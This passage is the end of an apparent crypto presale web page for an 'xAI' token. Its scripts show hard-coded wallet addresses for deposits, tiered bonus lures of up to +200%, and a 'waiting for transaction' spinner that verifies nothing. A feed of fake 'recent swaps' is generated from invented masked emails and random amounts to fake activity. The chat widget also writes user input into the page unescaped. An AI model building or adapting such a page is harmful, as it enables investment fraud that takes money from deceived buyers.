        </div>
        <div class="hidden bg-[#1a1c25] fade-change mt-6 p-6 relative rounded-2xl space-y-6 text-center z-30" id="paymentSection">
          <div class="space-y-2">
            <h2 class="text-white font-bold text-2xl">Payment Details</h2>
            <p class="text-sm text-gray-400">Deposit <span id="cryptoAmountText">1</span>
              <span id="currencyNameText">BTC</span> Complete your payment by scanning the QR code or entering the displayed wallet address.
            </p>
          </div>
          <div class="flex justify-center">
            <img class="border-2 bg-white border-gray-700 h-44 p-1 rounded-xl w-44" src="qr-btc.png" alt="QR Code" id="qrCodeImage">
          </div>
          <p class="text-sm border py-2 bg-gray-800 border-gray-600 break-all px-4 rounded-lg text-white" id="walletAddress"></p>
          <button class="rounded-lg transition-all duration-300 text-black bg-[#00ccff] font-bold hover:bg-[#00aacc] px-6 py-2" onclick="copyAddress(event)">COPY ADDRESS</button>
          <div class="text-sm text-gray-300 flex gap-2 items-center justify-center mt-2">
            <svg class="text-white h-4 w-4 animate-spin" fill="none" viewbox="0 0 24 24" stroke="currentColor">
              <circle class="opacity-25" cx="12" cy="12" r="10" stroke-width="4"></circle>
              <path d="M4 12a8 8 0 018-8" stroke-linecap="round" stroke-linejoin="round" stroke-width="4" class="opacity-75"></path>
            </svg> Waiting for transaction...
          </div>
          <div class="text-sm border rounded-lg bg-[#10121a] border-yellow-500 p-4 space-y-2 text-left text-yellow-300">
            <p>
              <strong class="text-red-400">IMPORTANT:</strong> Please keep this page open until the status updates to <span class="font-semibold text-green-400">“Completed”</span>.
            </p>
            <p>You’ll be redirected to set up your xAI wallet once the process is complete.</p>
          </div>
        </div>
      </div>
    </div>
    <!-- <link href="css/style.css" rel="stylesheet"> -->
    <div id="particles-presale">
      <canvas data-generated="true" style="width: 100%; height: 100%; pointer-events: none;" aria-hidden="true" width="1408" height="150"></canvas>
    </div>

    <script>
      particlesJS("particles-bg", {
  particles: {
    number: { value: 80, density: { enable: true, value_area: 800 } },
    color: { value: "#ffffff" },
    shape: {
      type: "circle",
      stroke: { width: 0, color: "#000000" },
      polygon: { nb_sides: 5 },
      image: { src: "img/github.svg", width: 100, height: 100 }
    },
    opacity: {
      value: 0.5,
      random: false,
      anim: { enable: false, speed: 1, opacity_min: 0.1, sync: false }
    },
    size: {
      value: 3,
      random: true,
      anim: { enable: false, speed: 40, size_min: 0.1, sync: false }
    },
    line_linked: {
      enable: true,
      distance: 150,
      color: "#ffffff",
      opacity: 0.4,
      width: 1
    },
    move: {
      enable: true,
      speed: 6,
      direction: "none",
      random: false,
      straight: false,
      out_mode: "out",
      bounce: false,
      attract: { enable: false, rotateX: 600, rotateY: 1200 }
    }
  },
  interactivity: {
    detect_on: "canvas",
    events: {
      onhover: { enable: true, mode: "repulse" },
      onclick: { enable: true, mode: "push" },
      resize: true
    },
    modes: {
      grab: { distance: 400, line_linked: { opacity: 1 } },
      bubble: { distance: 400, size: 40, duration: 2, opacity: 8, speed: 3 },
      repulse: { distance: 200, duration: 0.4 },
      push: { particles_nb: 4 },
      remove: { particles_nb: 2 }
    }
  },
  retina_detect: true
});
var count_particles, stats, update;
stats = new Stats();
stats.setMode(0);
stats.domElement.style.position = "absolute";
stats.domElement.style.left = "0px";
stats.domElement.style.top = "0px";
document.body.appendChild(stats.domElement);
count_particles = document.querySelector(".js-count-particles");
update = function () {
  stats.begin();
  stats.end();
  if (window.pJSDom[0].pJS.particles && window.pJSDom[0].pJS.particles.array) {
    count_particles.innerText = window.pJSDom[0].pJS.particles.array.length;
  }
  requestAnimationFrame(update);
};
requestAnimationFrame(update);

    </script>
    <script>
      const addressQrCodeImage = 'https://api.qrserver.com/v1/create-qr-code/?size=200x200&data='; 
            const tiers = [{"price":750},{"price":2000},{"price":5000}]; 
      const minimumDepositUSD = 500; 
      const exchangeRate = {"BTC":{"price":670909.089999999967403709888458251953125,"priceUSD":600000,"address":"bc1qk354hlysyjw4r2zzunaqtuuasj9xkqpc79qpn0","precision":8},"ETH":{"price":27556.360000000000582076609134674072265625,"priceUSD":4195.3900000000003274180926382541656494140625,"address":"0x6eC9E027D82f59A622E4E00B7f98b01b190E3dB4","precision":4},"BNB":{"price":2563.63999999999987267074175179004669189453125,"priceUSD":1022.220000000000027284841053187847137451171875,"address":"0x6eC9E027D82f59A622E4E00B7f98b01b190E3dB4","precision":4},"USDT":{"price":1.8200000000000000621724893790087662637233734130859375,"priceUSD":1,"address":"0x6eC9E027D82f59A622E4E00B7f98b01b190E3dB4","precision":4},"ADA":{"price":1.70999999999999996447286321199499070644378662109375,"priceUSD":0.82999999999999996003197111349436454474925994873046875,"address":"addr1qxewggvmj55lem0t5t6j8dty4vfh6tfum37twhes77hklf8r9hh098pn5838qunw5v9z7xdpf47rxyr0dt5scty00gmqg59rey","precision":4},"XRP":{"price":5.6699999999999999289457264239899814128875732421875,"priceUSD":2.850000000000000088817841970012523233890533447265625,"address":"raswikvmDpoEw6QeDsjb1N7doUyPMiUzdE","precision":4},"SOL":{"price":392.73000000000001818989403545856475830078125,"priceUSD":223.18999999999999772626324556767940521240234375,"address":"E7tdER6HoGL2FcpWWLTBJVY3XBShYgFWTAzzYDWYkXvg","precision":4},"TRX":{"price":0.65000000000000002220446049250313080847263336181640625,"priceUSD":0.340000000000000024424906541753443889319896697998046875,"address":"TEsRvx2QbsoYiY2YNaofY8ts9DzF8TYabF","precision":4}};
    </script>
    <script>

      const dropdownMenu = document.getElementById("dropdownMenu"); 
      const dropdownItems = dropdownMenu.querySelectorAll("li"); 

      const selectedIcon = document.getElementById('selectedIcon'); 
      const selectedText = document.getElementById('selectedText'); 

      const tierMessage = document.getElementById('tierMessage'); 
      const minAmountMessage = document.getElementById('minAmountMessage'); 

      const cryptoAmount = document.getElementById('cryptoAmount'); 
      const xaiOutput = document.getElementById('xaiOutput');

      function getCoinProfile(li) {
        return {
          image: li.querySelector('img').getAttribute('src'), 
          name: li.querySelector('span').innerText, 
        }
      }

      function setTierMessage(message, color) {
        tierMessage.innerHTML = message; 
        // tierMessage.classList.remove('hidden');
        tierMessage.className = `text-sm ${color} mt-1`; 
      }

      function hideTierMessage() {
        tierMessage.classList.add('hidden'); 
      }

      function updateTierMessage() {
        const inputCryptoAmount = cryptoAmountValue() ?? 0; 
        const selectedInputCrypto = selectedText.innerText; 

        if (!selectedInputCrypto) return; 

        const inputCryptoAmountUSD = (exchangeRate[selectedInputCrypto].priceUSD * inputCryptoAmount); 
        
        for (let i = 0; i < tiers.length; i++) {

          if (tiers[i].price <= inputCryptoAmountUSD && i !== tiers.length - 1) continue; 

          const remainingToInvest = (tiers[i].price - inputCryptoAmountUSD) / exchangeRate[selectedInputCrypto].priceUSD; 
          if (i === 0) {
            setTierMessage(`💡 Invest more ${remainingToInvest} ${selectedInputCrypto} to activate Tier 1. (+50% bonus)`, 'text-gray-400'); 
          } else if(i === 1) {
            setTierMessage(`⚡ Tier 1 Unlocked – +50% bonus. Missing amount ${remainingToInvest} ${selectedInputCrypto} to reach Tier 2 (+100%)`, 'text-yellow-400'); 
          } else if(i === 2 && remainingToInvest > 0) {
            setTierMessage(`🔥 Tier 2 Unlocked – +100% bonus. Missing amount ${remainingToInvest} ${selectedInputCrypto} to reach Tier 3 (+200%)`, 'text-yellow-300'); 
          } else {
            setTierMessage(`✅ Tier 3 Unlocked – You’re getting +200% xAI bonus!`, 'text-green-400'); 
          }
          break; 
        }
      }

      function hideMinimumAmountMessage() {
        minAmountMessage.classList.add('hidden'); 
      }

      function showMinimumAmountMessage(minAmount) {
        minAmountMessage.innerHTML = `Minimum required amount: ${minAmount} USD.`; 
        minAmountMessage.classList.remove('hidden'); 
      }

      function updateMinimumAmountMessage() {
        const inputCryptoAmount = cryptoAmountValue(); 
        const selectedInputCrypto = selectedText.innerText; 

        disableSwapButton(); 
        hideTierMessage(); 

        if (inputCryptoAmount === null || !selectedInputCrypto || selectedInputCrypto.startsWith('choose')) return; 

        const inputCryptoAmountUSD = (exchangeRate[selectedInputCrypto].priceUSD * inputCryptoAmount); 

        if (inputCryptoAmountUSD < minimumDepositUSD) {
          hideTierMessage(); 
          showMinimumAmountMessage(minimumDepositUSD); 
        } else {
          enableSwapButton(); 
          hideMinimumAmountMessage(); 
          updateTierMessage(); 
        }
      }

      function updateQuantityDescription() {
        updateMinimumAmountMessage(); 
        // updateTierMessage(); 
      }

      function updateXAiOutput() {
        const inputCryptoAmount = cryptoAmountValue() ?? 0; 
        const selectedInputCrypto = selectedText.innerText; 

        const xAiOutputAmount = ((exchangeRate[selectedInputCrypto].price ?? 0) 
          * inputCryptoAmount).toFixed(2); 
        xaiOutput.setAttribute('value', xAiOutputAmount); 
      }

      function setSelectedCoin({image, name}) {
        selectedIcon.classList.remove('hidden'); 
        selectedIcon.setAttribute('src', image); 
        selectedText.innerText = name; 
        toggleMenu(); 
        updateQuantityDescription(); 
        updateXAiOutput(); 
        updateNetworkWrapperFieldState(); 
      }

      function toggleMenu() {
        dropdownMenu.classList.toggle("hidden"); 
        dropdownMenu.classList.toggle("animate-dropdown-out"); 
      }

      function cryptoAmountValue() {
        return cryptoAmount.value ? parseFloat(cryptoAmount.value) : null; 
      }

      dropdownItems.forEach(li => {
        li.onclick = () => {
          const coinProfile = getCoinProfile(li); 
          setSelectedCoin(coinProfile); 
        }
      })

      document.getElementById("dropdownBtn").onclick = function() {
        toggleMenu(); 
      }

      cryptoAmount.oninput = function() {
        updateXAiOutput(); 
        updateQuantityDescription(); 
      }

    </script>
    <script>
      const emailDomains = [
        // "163.com",
        "protonmail.com",
        "outlook.com",
        "yahoo.com",
        "icloud.com",
        "zoho.com",
        "mail.ru",
        "mail.com",
        "fastmail.com",
        "hey.com",
        "zoho.eu",
        "office.com",
        // "126.com",
        "qq.com",
        "me.com",
        // "hushmail.com", 
        // "sina.com"
      ];
      const emailUsernames = [
        "john.smith", "samantha.james", "a.williams", "emily.clark", "michael.brown", "linda.thomas",
        "robert.johnson", "carla.evans", "nathan.taylor", "julie.morris", "steven.davis", "nina.adams",
        "brian.miller", "claire.moore", "k.hughes", "david.jameson", "t.martin", "laura.white",
        "alex.lee", "victoria.green", "c.thompson", "george.baker", "jessica.hall", "rachel.king",
        "daniel.scott", "isabelle.reed", "nicholas.cox",      
        "josh1986", "emma2021", "luke_93", "sarah1988", "dan_2000", "mia_77", "tom94", "lucy_300",
        "kevin001", "zoe88", "matt_22", "oliver_84", "tina2023", "leo990", "karen65", "rebecca91",
        "bobby2002", "natalie76", "jackson83", "chris_07"
    ];      

      const swapFeed = document.getElementById('swap-feed'); 
      const swapPanel = document.getElementById('recent-swaps'); 

      function toggleSwapsPanel() {
        swapPanel.classList.toggle('hidden'); 
      }

      function updateSwapEntryTimeAgo() {
        swapFeed.querySelectorAll('li').forEach(e => {
          const secondsAgo = Math.floor((Date.now() - parseInt(e.getAttribute('data-timestamp'))) / 1000); 

          e.querySelector('.timeago').innerHTML = `${secondsAgo}s ago`; 
        }); 
      }

      function generateExchangeItem() {

        const amount = Math.floor(Math.random() * (10000 - 1000) + 1000); 
        const email = emailUsernames[Math.floor(Math.random() * emailUsernames.length)].slice(0, 3) + '***@' + emailDomains[Math.floor(Math.random() * emailDomains.length)]; 

        const t = document.createElement('template'); 
        t.innerHTML = `<li class="swap-entry leading-snug" data-timestamp="${Date.now()}"><div>💱 $${amount} – ${email}</div><div class="text-xs text-gray-400 ml-5 timeago">0s ago</div></li>`; 

        const firstElementChild = swapFeed.querySelector(':scope > *');
        if (swapFeed.childElementCount >= 3 && firstElementChild) {
          swapFeed.removeChild(firstElementChild);
        }
        swapFeed.appendChild(t.content.firstChild); 

        const min = 5 * 1000; 
        const max = 45 * 1000; 
        setTimeout(generateExchangeItem, Math.random() * (max - min) + min); 
      }


      generateExchangeItem(); 


      setInterval(updateSwapEntryTimeAgo, 1000); 
    </script>
    <script>
      const chatBox = document.getElementById('chat-box'); 
      const chatToggle = document.getElementById('chat-toggle');
      const chatClose = document.getElementById('close-chat'); 
      
      const chatForm = document.querySelector('#chat-form'); 
      const chatSubmitBtn = document.querySelector('#chat-form button[type=submit]'); 
      const chatInput = document.querySelector('#chat-input'); 
      const chatMessages = document.querySelector('#chat-messages'); 

      function submitChat() {
        const chatMessage = chatInput.value; 

        const t = document.createElement('template'); 
        t.innerHTML = `<div class="flex justify-end"><div class="bg-blue-500 text-white px-3 py-2 rounded-lg max-w-xs">${chatMessage}</div></div>`; 

        chatMessages.appendChild(t.content.firstChild); 
      }

      if (chatToggle && chatForm && chatClose) {
        chatToggle.onclick = () => {
          chatBox.classList.toggle('hidden');
          chatBox.classList.toggle('opacity-0');
          chatBox.classList.toggle('opacity-100');
        } 

        chatForm.onsubmit = (e) => {
          e.preventDefault(); 
          submitChat(); 
          chatInput.value = ''; 
        }

        chatClose.onclick = () => {
          chatBox.classList.add('hidden');
          chatBox.classList.add('opacity-0');
          chatBox.classList.remove('opacity-100');
        }
      }

    </script>
    <script>
      const paymentSection = document.querySelector('#paymentSection'); 
      const formSection = document.querySelector('#formSection'); 

      const paymentCryptoAmountText = document.querySelector('#cryptoAmountText'); 
      const paymentCurrencyNameText = document.querySelector('#currencyNameText'); 
      const paymentQrCodeImage = document.querySelector('#qrCodeImage'); 
      const paymentWalletAddress = document.querySelector('#walletAddress'); 

      function showPayment() {
        formSection.classList.add('hidden'); 
        paymentSection.classList.remove('hidden'); 

        const inputCryptoAmount = cryptoAmountValue() ?? 0; 
        const selectedInputCrypto = selectedText.innerText; 

        const address = exchangeRate[selectedInputCrypto].address; 
        const precision = exchangeRate[selectedInputCrypto]?.precision ?? 2; 

        paymentCryptoAmountText.innerHTML = inputCryptoAmount.toFixed(precision); 
        paymentCurrencyNameText.innerHTML = selectedInputCrypto; 
        paymentQrCodeImage.setAttribute('src', addressQrCodeImage + address); 
        paymentWalletAddress.innerText = address; 
      }

      function copyAddress(e) {
        const copyBtn = e.target; 

        if (copyBtn.innerText.trim() === 'Copied!') return;  

        const selectedInputCrypto = selectedText.innerText; 

        const address = exchangeRate[selectedInputCrypto].address; 

        navigator.clipboard.writeText(address).then(() => {
          const origText = copyBtn.innerText; 
          copyBtn.innerText = 'Copied!'; 
          setTimeout(() => {
            copyBtn.innerText = origText; 
          }, 1500); 
        }).catch(err => {
          console.error("Failed to copy: ", err);
        });

      }

    </script>
    <script>
      const swapButton = document.querySelector('#swapButton'); 

      function disableSwapButton() {
        swapButton.classList.add('opacity-50'); 
        swapButton.classList.add('cursor-not-allowed');
        swapButton.classList.remove('cursor-pointer');
        swapButton.setAttribute('disabled', true); 
      }
      function enableSwapButton() {
        swapButton.classList.remove('opacity-50'); 
        swapButton.classList.remove('cursor-not-allowed');
        swapButton.classList.add('cursor-pointer');
        swapButton.removeAttribute('disabled'); 
      }
      function updateSwapButtonState() {

      }
      function exchange() {
        console.log(111); 
        const inputCryptoAmount = cryptoAmountValue() ?? 0; 
        const selectedInputCrypto = selectedText.innerText; 

        if (!selectedInputCrypto || selectedInputCrypto.startsWith('choose')) {
          alert('⚠️ Kindly choose a cryptocurrency to proceed'); 
          return; 
        }

        console.log(111); 
        showPayment(); 
      }
      swapButton.onclick = exchange; 
    </script>
    <script>
       const networkWrapper = document.querySelector('#networkWrapper'); 
       function updateNetworkWrapperFieldState() {
        if (selectedText.innerText === 'USDT') {
          networkWrapper.classList.remove('hidden');
          return;  
        }
        networkWrapper.classList.add('hidden'); 
       }
    </script>

</body>
</html>
